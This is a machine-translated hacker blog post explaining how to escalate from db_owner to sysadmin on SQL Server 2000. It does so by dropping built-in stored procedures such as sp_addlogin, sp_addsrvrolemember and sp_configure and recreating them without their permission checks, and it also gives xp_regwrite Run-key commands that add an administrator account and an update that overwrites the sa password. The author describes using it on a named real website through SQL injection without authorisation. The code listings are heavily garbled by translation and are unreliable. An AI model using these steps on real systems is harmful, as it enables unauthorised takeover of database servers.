From the Church BLOG statement: This article is only used for teaching purposes, and if it is not responsible for the attack consequences of this article. Because of the fact that it is too harmful, the original text has been deleted and modified, even if the harmfulness of this article is still large, please do not do any destructive operations for the domestic site. Considering the thirty, even decided to send it. The means of this trick, the use range is wide, it can be said that as long as there is a website with SQL injection vulnerability, just apply 99% of this method to get Webshell or even system privileges (do not dare to say full, huh, huh, he has hundreds of truths "Practical exercise", basically 100% can get WebShell or even system privileges). I remember that I wrote a method that uses XP_REGWRITE to obtain system privileges in "MSSQL DB_OWNER Role Inject Directions (Continued)": XP_REGWRITE 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVers Ion / Run', 'XWQ1 ',' REG_SZ ',' net user xwq xwq / add'xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / currentvers ion / run', 'xwq2', 'REG_SZ', 'net localgroup administrators xwq / add', as long as Let the server where the site is restacked, you can get system authority. After hundreds of true experiments, this method is not practical, it is easy to cause the network management's attention, and then DDOS is also illegal things (even good people), launch a lot of manpower, material resources, material resources ( Look at your broiler how much it is. So not feasible (unless you want to get it very much). Oh, so much, you may see it is not impatient, good, this introduces one of my three must-killing techniques --- 万 提 提.
If there is a website exists in SQL injection vulnerability, if this website is a user who uses the user of the fixed server sysadmin authority (huh, the popular point is SA, the rookie can think so), huh, I want to get a WebShell or system authority. It is easy to make a lifetime, as far as I know, sysadmin authority should get 10 kinds of WebShell or system privileges, huh, maybe more (even 10 kinds), how to get Webshell or system privilege, I I don't want to say more, I want to be sharpened than everyone, but if a website is DB_OWNER permission? What do you do, how do you take system privileges, how to take WebShell (no upload vulnerabilities and database backups), everyone may return backup a shell, I remember that LCX also said in "MSSQL DB_OWNER role injecting system permissions" "The shell" backup shell is just the theoretical stuff, if a WebShell has 20MB, can you use it? "Oh, if I tell you that DB_OWNER gets a WebShell or system permission method and sysadmin privileges. More, what is your reflection? Is it a bit incredible, or I said? (Do not believe in friends, don't look at it below) Oh, is it tips itchy, can't wait to know, good, I am not talking, this will put my three major killing skills. --- Universal improvement permission method tells everyone. Before telling everyone, let's take an experimental environment WindowsXP SP1 SQL 2000 SP3, everyone follows me to Step to Step, first create a user with DB_OWNER, here I am XWQ (就 是 Do nothing in the server role Select, hook DB_OWNER in the database role), ok, now we open the query analyzer with XWQ, enter sp_addlogin xuwenqiang, execute it, what to pull? Server: Message 2571, Level 14, State 2, Procedure SP_ADDLOGIN, line 16 User 'XWQ' No permissions of DBCC Auditevent. Server: Message 15247, Level 16, State 1, Process SP_ADDLOGIN, Row 17 The user does not perform the permissions of this operation.
Oh, the above error message appears, this is normal, because only the members of the sysadmin and securityadmin fixed server roles can perform sp_addlogin, so how can I make sp_addlogin? Here we look at the sp_addlogin code: create procedure sp_addlogin @loginame sysname, @ passwd sysname = Null, @ defdb;; sysname = 'master' - UNDONE: DEFAULT CONFIGURABLE ???, @ deflanguage sysname = Null, @ sid varbinary (16) = null, @ encryptopt varchar (20) = NULLAS - SETUP Runtime Options / Declare Variables - Set NoCount On Declare @ret Int - Return Value of SP Call - Check Permissions - IF (NOT IS_SRVROLEMEMBER (' SECURITYADMIN ') = 1) Begin DBCC Auditevent (104, 1, 0, @SID) RAISERROR (15247, -1, -1) RETURN (1) Else Begin DBCC Auditevent (104, 1, 1, @loginame, null, null, @SID) End - displicit_transactions offiffi (@@ TRANCOUNT> 0) Begin Raiserror (15002, -1, -1, 'sp_addlogin') Return (1) End - Validate Login Name As: - (1) Valid SQL Name (SQL Login) - (2) No Backslash - (3) Not a reserved login name execute @ret = sp_validname @loginame if ( @RET <> 0) Return (1) IF (Charindex ('/', @LoginaMe> 0) Begin Raiserror (15006, -1, -1, @ loginame) Return (1) End - Note: Different Case SA IS allowed. if (@loginame = 'sa' or lower (@loginame) in ('public')) Begin Raiserror (15405, -1, -1, @loginame) Return (1) end - login name must not alreadyady EXIST - IF EXISTS (Select * from master.dbo.syslogins where loginname = @
Loginame) Begin Raiserror (15025, -1, -1, @ loginame) Return (1) end - validate default database - if DB_ID (@DEFDB) is Null Begin Raiserror (15010, -1, -1, @ DEFDB) return (1) end - VALIDATE DEFAULT LANGUAGE - IF (@deflanguage IS NOT Null) begin Execute @ret = sp_validlang @deflanguage IF (@ret <> 0) return (1) end ELSE begin select @deflanguage = name from master .dbo.syslanguages where langid = @@ default_langid --server default language if @deflanguage is null select @deflanguage = N'us_english 'end - VALIDATE SID IF GIVEN - if ((@sid IS NOT null) and (datalength ( @SID) <> 16)) Begin Raiserror (15419, -1, -1) RETURN (1) end else if @SID is null select @SID = newid () IF (SUSER_SNAME (@SID) IS NULL) Begin Raiserror (15433, -1, -1) RETURN (1) end - validate and use encryption option - declare @xstatus smallint select @xstatus = 2 - access if @Encryptopt is null select @passwd = pwdencrypt (@passwd) Else IF @Encryptopt = 'skip_encryption_old' begin select @xstatus = @XS TATUS | 0x800, - Old-style encryption @passwd = convert (sysname, convert (varbinary (30), Convert (varchar (30), @passwd)) ELSE IF @Encryptopt <> Skip_encryption 'Begin Raiserror (15600 , -1, -1, 'sp_addlogin') Return 1 End - Attempt the insert of the new login - Insert INTO MASTER.DBO.SYSXLOGINS VALUES (NULL, @SID, @XSTATUS, GETDATE (), Getdate (), @Loginame, Convert (varbinary (256), @passwd, db_id (@Defdb), @Deflanguage) if @@ error <>
0 - this indicates we saw duplicate row return (1) - UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE - exec ( 'use master grant all to null') - FINALIZATION: RETURN SUCCESS / FAILURE - raiserror (15298, -1, -1) RETURN (0) - sp_addlogingo only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin, mainly here again to fade - Check Permissions - IF (not is_srvrolemember " SECURITYADMIN ') = 1) Begin DBCC Auditevent (104, 1, 0, @SID) RAISERROR (15247, -1, -1) RETURN (1) Else Begin DBCC Auditevent (104, 1, 1, @Loginame, NULL, NULL, @SID) END As long as we cut this code, any permissions can increase user pull.
Well, we first pull-drop procedure sp_addlogin sp_addlogin deleted and then restored again sp_addlogincreate procedure sp_addlogin @loginame sysname, @ passwd sysname = Null, @ defdb;; sysname = 'master' - UNDONE: DEFAULT CONFIGURABLE ???, @ deflanguage sysname = Null, @ sid varbinary (16) = null, @ encryptopt varchar (20) = NULLAS - SETUP Runtime Options / Declare Variables - Set NoCount On Declare @ret Int - Return Value of SP Call - Disallow User Transaction Set Implicit_Transactions Off (@@Trancount> 0) Begin Raiserror (15002, -1, -1, 'sp_addlogin') Return (1) end - validate login name as: - (1) Valid SQL Name (SQL login) - (2) No backslash - (3) Not a reserved login name execute @ret = sp_validname @Loginame if (@ret <> 0) Return (1) IF (Charindex ('/', @ Loginame)> 0) Begin Raiserror (15006, -1, -1, @ loginame) Return (1) end - note: Different Case Sa is allowed. if (@loginame = 'sa' or lower (@logina) Me) IN ('public')) Begin Raiserror (15405, -1, -1, @Loginame) Return (1) end - login name must not already exist - if exists (Select * from master.dbo.syslogins where Loginname = @loginame) Begin Raiserror (15025, -1, -1, @ loginame) Return (1) end - validate default database - if DB_ID (@defdb) is Null Begin Raiserror (15010, -1, -1, @defdb) return (1) end - VALIDATE DEFAULT LANGUAGE - IF (@deflanguage IS NOT Null) begin Execute @ret = sp_validlang @deflanguage IF (@ret <> 0) return (1) end ELSE begin select @deflanguage =
name from master.dbo.syslanguages where langid = @@ default_langid --server default language if @deflanguage is null select @deflanguage = N'us_english 'end - VALIDATE SID IF GIVEN - if ((@sid IS NOT Null) and (DATALENGTH <> 16)) Begin Raiserror (15419, -1, -1) RETURN (1) end else if @SID is null select @sid = newid () f (SUSER_SNAME (@SID) IS Not NULL Begin Raiserror (15433, -1, -1) RETURN (1) end - validate and use encryption option - Declare @xstatus smallint select @xstatus = 2 - access if @Encryptopt is null select @passwd = pwdePt (@ passwd) else if @encryptopt = 'skip_encryption_old' begin select @xstatus = @xstatus | 0x800, - old-style encryption @passwd = convert (sysname, convert (varbinary (30), convert (varchar (30), @passwd) )) END ELSE IF @ENCRYPTOPT <> 'Skip_Encryption' Begin Raiserror (15600, -1, -1, 'sp_addlogin') Return 1 End - Attempt The Insert of the New Login - Insert Into Master.dbo.sysxlogins Values Null, @SID, @XSTATUS, GETDATE (), Getdate (), @loginame, convert (Varbinary (256), @passwd, db_id (@defdb), @Deflanguage) IF @@ error <> 0 - this INDICES WE SAW DUPLICATE ROW RETURN (1) - UPDATE PROTECTION TOMESTAMP for Master DB, To Indicate Syslogins Change - EXEC ('Use Master Grant All to Null') - Finalization: Return Success / Failure - Raiserror (15298, -1, -1) RETURN (0) - sp_addlogingo I only increase the user pull, OK, I'm entering sp_addlogin xuwenqiang, executes a new login in the Query Analyzer in the Query Analyzer.
I created a user Xuwenqiang, of course, this user is not white, I want to turn him into a maximum authority, of course, the highest permission in SQL is sysadmin, and turn a user into sysadmin only sp_addsrvrolememberMber This storage process is pulled, but only sysadmin privileges are used, unhappy, even let him use it for me, huh, huh, smart readers must think about how to let me only have DB_OWNER privilege, how to use sp_addsrvroleMemember pull, yes , and let sp_addlogin the same as the method I used, as long as permission to remove some restrictions sp_addsrvrolemember, we can add any sysadmin pull, we take a look at sp_addsrvrolemember code: create procedure sp_addsrvrolemember @loginame sysname, - login name @rolename sysname = NULL - server role nameas - SETUP RUNTIME OPTIONS / DECLARE VARIABLES - set nocount on declare @ret int, - return value of sp call @rolebit smallint, @ismem int - DISALLOW USER TRANSACTION - set implicit_transactions off IF (@@Trancount> 0) Begin Raiserror (15002, -1, -1, 'sp_addsrvrolemember') Return (1) end - validate server role name, checking permissions - select @ismem = is_srvrolemember (@rolename) if @ISMEM Is Null Begin DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME, NULL) RAISERROR (15402, 1, -1, @ropename) Return (1) end if @ismem = 0 Begin DBCC Auditevent (108, 1, 0, @loginame, null, @ropename, null) Raiserror (15247, -1, -1) Return ( 1) END - AUDIT A SUCCESSFUL SECURITY CHECK - DBCC Auditevent (108, 1, 1, @Loginame, Null, @ropename, null) - Cannot Change Sa Roles - IF @loginame = 'Sa' Begin Raiserror (15405 , -1, -1, @Loginame) Return (1) end - Obtain the bit for this role - select @Rolebit = Case @roleName When 'sysadmin'
THEN 16 WHEN 'securityadmin' THEN 32 WHEN 'serveradmin' THEN 64 WHEN 'setupadmin' THEN 128 WHEN 'processadmin' THEN 256 WHEN 'diskadmin' THEN 512 WHEN 'dbcreator' THEN 1024 WHEN 'bulkadmin' THEN 4096 ELSE NULL END - ADD ROW FOR NT LOGIN IF NEEDED - if not exists (select * from master.dbo.syslogins where loginname = @loginame) begin execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame if (@ret <> 0) begin raiserror (15007, -1, -1, @ loginame) RETURN (1) end end - update role membership - update master.dbo.sysxlogins set xstatus = xstatus | @Rolebit, xdate2 = getdate () where name = @loginame and srvid is null - Update PROTECTION TIMESTAMP FOR MASTER DB, tO INDICATE SYSLOGINS CHANGE - exec ( 'use master grant all to null') raiserror (15488, -1, -1, @ loginame, @ rolename) - FINALIZATION: rETURN SUCCESS / FAILURE return (@ @err or) - sp_addsrvrolememberGO delete this paragraph - VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS - select @ismem = is_srvrolemember (@rolename) if @ismem is null begin dbcc auditevent (108, 1, 0, @loginame, NULL, @ Raiserror (15402, -1, -1, @ropename) Return (1) end if @ismem = 0 Begin DBCC Auditevent (108, 1, 0, @loginame, null, @ropename, null) Raiserror (15247 , -1, -1) Return (1) END This can be arbitrarily adding sysadmin pull, huh, huh, cool. Enter sp_addsrvrolemember xuwenqiang, sysadmin, yeah !!!!!!! successfully pulled in the query analyzer.
Here, we successfully use users who have only DB_OWNER privileges to create a newly-supreme permission in SQL, which is user XuwenQiang with sysadmin privilege, there is a syshell or system permission is not easy! Don't just put your eyes only on the two stored procedures I said, if only sysadmin is useless, we can use my universal proponentity. For example: sp-configure, sp_addlinkedServer, sp_addlinkedsrvlogin, sp_makewebtask, etc. A lot of SYSADMIN permissions can be used, we can make them use me. Let's take an example of a universal rights to create a back door that will never be killed and perfect. We all know that there is a hacker called the back door in SQL, that is, SA, sa is built-in administrator login And you cannot make changes and delete. Oh, this is M $ saying, if you have seen another article I wrote, "completely delete SA this back door", it is also known that the SA is also deleted. We know that there is sp_password in SQL can change the password, but we must know the old password of the user to change, can you change, then there is no way to change the SA password without knowing the old password? Yes, in fact, the functionality of sp_configure, sp_configure is to display or change the global configuration settings for the current server. SP_CONFIGURE (Change Configuration Options) is permitted by default awarding sysadmin and serveradmin fixed server roles. This is easy to remove the permissions in sp_configure to check the permissions, and then rebuild, we will use it.
CREATE PROCEDURE sp_configure --- 1996/08/14 09:43 @configname varchar (35) = NULL - option name to configure, @ configvalue int = NULL - new configuration valueasset nocount ondeclare @confignum int --Num of the opt to be configured, @ configcount int --Num of options like @configname, @ show_advance int --Y / N Read & Write actions on "advanced" optsdeclare @fullconfigname varchar (35) declare @prevvalue int / *** Determine @maxnumber based on . advance option in syscurconfigs * / if (select value from master.dbo.syscurconfigs where config = 518) = 1 select @show_advance = 1 - Display advanced optionselse select @show_advance = 0 - Do not display advanced options / ** * Make certain that max user info. reflects any addpak upgrades. * / if (select high from master.dbo.spt_values where number = 103 and type = 'C') <> @@ max_connections update master.dbo.spt_values set high = @@max_connections where number ER = 103 and type = 'c' / *** if no option name is given, the procedure will just print out all the ** Options and their value. * / if @configname is null begin select name, minimum = low, maximum = high, config_value = c.value, run_value = master.dbo.syscurconfigs.value from master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs where type = 'C' and number = c.config And Number = Master.dbo.syscurconfigs.config and ((C.Status & 2 <> 0 and @
SHOW_ADVANCE = 1) OR (C.Status & 2 = 0)) Order by Lower (Name) Return (0) End / *** Use @configname and try to find the right option. ** if the isn't just one , print appropriate diagnostics and return. * / select @configcount = count (*), @fullconfigname = min (v.name), @prevvalue = min (c.value) from master.dbo.spt_values v, master.dbo.sysconfigures c where v.name like '%' @configname '%' and v.type = 'c' and v.number = c.config and @Status & 2 <> 0 and @show_advance = 1) OR (C.Status & 2 = 0)) / *** if no option, Show the user what the Options area. * / if @configcount = 0 Begin Raiserror (15123, -1, -1, @ configname) Print '' Raiserror (15456, -1, -1) / * ** show the user what the Options are. * / select name, minimum = low, maximum = high, config_value = C.Value, Run_Value = Master.dbo.syscurconfigs.valueFrom master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs where type = 'c' and number = c.syscurconfigs.dbo.syscurconfigs.config and ((C.Status & 2 < > 0 and @show_advance = 1) OR (C.Status & 2 = 0)) Return (1) end / *** if More Than Open Option Like @Configname, Show the duplicates and return. * / If @configcount> 1 Begin Raiserror (15124, -1, -1, @ configname) Print ''
Select duplicate_options = name from master.dbo.spt_values, master.dbo.sysconfigures c where name limited '%' @configname '%' and type = 'c' and number = c.config and ((C.Status & 2) <> 0 and @Show_advance = 1) or (C.Status & 2 = 0)) Return (1) endelse / * there get the full name. * / Select @configname = name -, @ value_in_sysconfigures = c.value from master.dbo.spt_values, master.dbo.sysconfigures c where name like '%' @configname '%' and type = 'C' and number = c.config and ((c.status & 2 <> 0 and @Show_advance = 1) or (C.Status & 2 = 0)) / *** if @configvalue is null, Just Show The Current State of the Option. * / If @configValue is NullBegin Select V. Name, v.low as' minimum ', v.high as' maximum', C.Value as' config_val UE ', u.value as' run_value' from master.dbo.spt_values v left outer join master.dbo.sysconfigures c on v.number = c.config left outr ..dbo.syscurconfigs u on v.number = u. CONFIG where v.type = 'c' and v.name like '%' @configname '%' and ((C.Status & 2 <> 0 and @show_advance =
1) OR (C.Status & 2 = 0)) Return (0) end / *** Now get the configuration number. * / Select @confignum = number from master.dbo.spt_values, master.dbo.sysconfigures c Where Type = 'C' and (@configvalue between low and high or @configvalue = 0) And name like '%' @configname '%' and number = c.config and ((C.Status & 2 <> 0 and @ SHOW_ADVANCE = 1) OR (C.Status & 2 = 0)) / *** if this is the number of default language, we want to make sure ** That the new value is a valid language id in syslanguages. * / if @confignum = 124 begin if not exists (select * from master.dbo.syslanguages where langid = @configvalue) begin / * 0 is default language, us_english * / if @configvalue <> 0 begin raiserror (15127, -1, -1 RETURN (1) end end / *** if this is the number of kernel lang uage, we want to make sure ** that the new value is a valid language id in Syslanguages. * / if @confignum = 132 begin if not exists (select * from master.dbo.syslanguages where langid = @configvalue) begin / * 0 Is Default Language, US_ENGLISH * / IF @ConfigValue <> 0 Begin Raiserror (15028, -1, -1) Return (1) end end / *** "User Options" Should Not Try to set incompatible options / value. * / if @confignum = 1534 - "User Options" Begin IF (@ConfigValue & (1024
2048) = (1024 2048)) --ansi_null_default_on / off begin raiserror (15303, -1, -1, @ configValue) Return (1) end end / *** although the @configname isn '@ In Ranfignum Is Null Begin Raiserror (15129, -1, -1, @ configValue, @ configname) Return (1) end - msg 15002, But in 6.5 Allow this Inside A TXN (Not Check @@ trancount) # 12828 ./*** Now update sysconfigures * / update master.dbo.sysconfigures set value = @configvalue where config = @confignum / *** Flush the procedure cache -. this is to account for options which become ** effective immediately (. ie dont need a server restart) * / dbcc freeproccacheraiserror (15457, -1, -1, @fullconfigname, @prevvalue, @configvalue) with logreturn (0) -. sp_configureGO ok, then we sp_configure 'allow updates ', 1Goreconfigure with overridego, so we can change the password of the SA. Next update sysxlogins set password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A 1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid = 0x01, such sa password was changed we pull pull 111111. Oh, the solution to the solution is to delete the sa. How to delete I can refer to my "completely delete SA this back door". Example: The following is a good-time attack test of a domestic and very famous site to make a probably verification of the above knowledge. For many factors, we call this site is www. ** 173.com. Www. ** 173.com This site is very famous on the game, ranking 20 (when I test), here I don't want to say how I found the injection point, everyone can still find it, still more (The whole test can really spend a lot of time, don't misunderstand, I don't say time spend "testing", but put it in the write program, don't write like a sample, how to make me what you want? • The whole attack is only 10 minutes.
In the found injection point GameType = ** (depressed, if there is NBSI2 when testing, it is easy to be relaxed), first enter Drop Procedure SP_ADDLOGIN, then entered in IE (Oh, I certainly write the program I wrote inside input puller) create procedure sp_addlogin @loginame sysname, @ passwd sysname = Null, @ defdb;; sysname = 'master' - UNDONE: DEFAULT CONFIGURABLE ???, @ deflanguage sysname = Null, @ sid varbinary (16) = Null , @ encryptopt varchar (20) = NullAS - SETUP RUNTIME OPTIONS / DECLARE VARIABLES - set nocount on Declare @ret int - return value of sp call - DISALLOW USER TRANSACTION - set implicit_transactions off IF (@@ trancount> 0 Begin Raiserror (15002, -1, -1, 'sp_addlogin') Return (1) end - validate login name as: - (1) Valid SQL Name (SQL Login) - (2) No backslash (NT Users ONLY - (3) Not a reserved login name execute @ret = sp_validname @Loginame if (@ret <> 0) Return (1) IF (Charindex ('/', @Loginame)> 0) Begin Raiserror (15006, -1, -1, @ loginame) Return (1) End - Note: Different Case Sa IS Allowed. if (@loginame = 'sa' or 0.. @loginame) in ('public')) Begin Raiserror (15405, -1, -1, @Loginame) Return (1) end - login name must not already exist - if EXISTS (Select * from master.dbo.syslogins where loginname = @loginame) Begin Raiserror (15025, -1, -1, @ loginame) Return (1) end - validate default database - if DB_ID (@Defdb) IS NULL BEGIN RAISERROR (15010, -1, -1, @ DEFDB) RETURN (1) end - validate default language - if (@Deflanguage is not null) begin execute @ret =
sp_validlang @deflanguage IF (@ret <> 0) return (1) end ELSE begin select @deflanguage = name from master.dbo.syslanguages where langid = @@ default_langid --server default language if @deflanguage is null select @deflanguage = N 'US_ENGLISH' END - VALIDATE SID IF GIVEN - IF ((@SID IS NOT NULL) AND (Datalength (@SID) <> 16)) Begin Raiserror (15419, -1, -1) RETURN (1) ELSE IF @SID is null select @sid = newid () ing (SUSER_SNAME (@SID) IS NULL) Begin Raiserror (15433, -1, -1) RETURN (1) end - validate and use encryption option - Declare @ xstatus smallint select @xstatus = 2 - access if @encryptopt is null select @passwd = pwdencrypt (@passwd) else if @encryptopt = 'skip_encryption_old' begin select @xstatus = @xstatus | 0x800, - old-style encryption @passwd = Convert (sysname, convert (varbinary (30), convert (varchar (30), @passwd)) END ELSE IF @Encryptopt <> SKIP_ENCRYPTION 'Begin Raiserror (15600, -1, -1,' sp_addlogin ') Return 1 End - Attempt the insert of the new l Ogin - Insert Into Master.dbo.sysxlogins Values (Null, @SID, @XSTATUS, GETDATE (), Getdate (), @Loginame, Convert (Varbinary (256), @Passwd, db_id (@Defdb), @Deflanguage @@ error <> 0 - this indeicates we cut duplicate row return (1) - Update Protection TimeStamp for master db, to indecate syslogins change - EXEC ('use master grant all to null "
) - Finalization: RASERROR (15298, -1, -1) RETURN (0) - sp_addlogingook, our new user exec master..sp_addlogin XWQ Drop Procedure SP_ADDSRVROLEMEMBER, then enter CREATE in IE procedure sp_addsrvrolemember @loginame sysname, - login name @rolename sysname = NULL - server role nameas - SETUP RUNTIME OPTIONS / DECLARE VARIABLES - set nocount on declare @ret int, - return value of sp call @rolebit smallint, @ IsMem Int - Disallow User Transaction - Set Implicit_Transactions Offiff (@@Trancount> 0) Begin Raiserror (15002, -1, -1, 'sp_addsrvrolemember') Return (1) end - Cannot Change Sa Roles - IF @ Loginame = 'Sa' Begin Raiserror (15405, -1, -1, @Loginame) Return (1) end - obtain the bit for this role - select @Rolebit = Case @roleName when 'sysadmin' Then 16 WHEN 'SecurityAdmin 'Then 32 When' ServerAdmin 'Then 64 White EN 'setupadmin' THEN 128 WHEN 'processadmin' THEN 256 WHEN 'diskadmin' THEN 512 WHEN 'dbcreator' THEN 1024 WHEN 'bulkadmin' THEN 4096 ELSE NULL END - ADD ROW FOR NT LOGIN IF NEEDED - if not exists (select * From master.dbo.syslogins where loginname = @loginame) Begin execute @ret = sp_msaddlogin_implicit_ntlogin @loginame if (@ret <> 0) Begin Raiserror (15007, -1, -1, @
loginame) return (1) end end - UPDATE ROLE MEMBERSHIP - update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate () where name = @loginame and srvid IS NULL - UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE - EXEC ('Use Master Grant All to Null') Raiserror (15488, -1, -1, @ loginame, @ ROLENAME) - Finalization: Return Success / Failure Return (@@ Error) - - sp_addsrvrolemembergo then execim master..sp_addsrvrolemember xwq, sysadmin We take the SQL comprehensive utilization tool or query analyzer to connect to see, huh, success, so we are in WWW. ** 17173.com serveratively built a User XWQ pull, the highest permission, I think everyone should go back. Oh, because just safety test, I didn't go deep into, delete the account, clear the log, and the flash. Seeing pulling, one of my killing skills - the power to pull the power, as long as I give me an injection point, no matter what permissions, I will give you a WebShell or even system privileges. Oh, actually said that The improvement permission method is indeed a bit exaggerated, because Create Procedure's permission is awarded the Sysadmin fixed server role member and DB_OWNER and DB_DDLADMIN fixed database role members, if you encounter public permissions, it is not easy to use. But don't think that it is converted to public privileges, there is no way to get WebShell or system authority. On the contrary, there is at least five methods for users who know the public permissions of public permissions. The best prevention method is to eliminate injection vulnerabilities, this is the solution to the rules and cure. (Oh, if I said, the most beautiful permissions of public rights will not be given, but unfortunately, there is no longer than the Public permission, no way to use a lot of dangerous storage procedures, and public can't remove, It seems that M $ is still very loved on us), the article is that this article is in April 2004 to install SQL. Since SQL, it is written in the school. After the end of December, because of the harm too much, I I have never been released, I believe that some people know in the country. Just not open. After three considerations, I decided to release it. I hope everyone can master any destructive operations for domestic sites. In this article, I didn't mention how the public permissions users got to WebShell or system permissions, and the user who knows the public permissions of public privileges at least five types (even five kinds, " There may be more ways, if it is more masters, I hope I can enlighten me, even Xie La), given that the harm is really a lot, is now not publishing these key technical details, waiting until a suitable opportunity , I will give you the knowledge I have selfless to everyone to reiterate again. Do not destroy any legal hosts in any country, otherwise the consequences are at your own risk.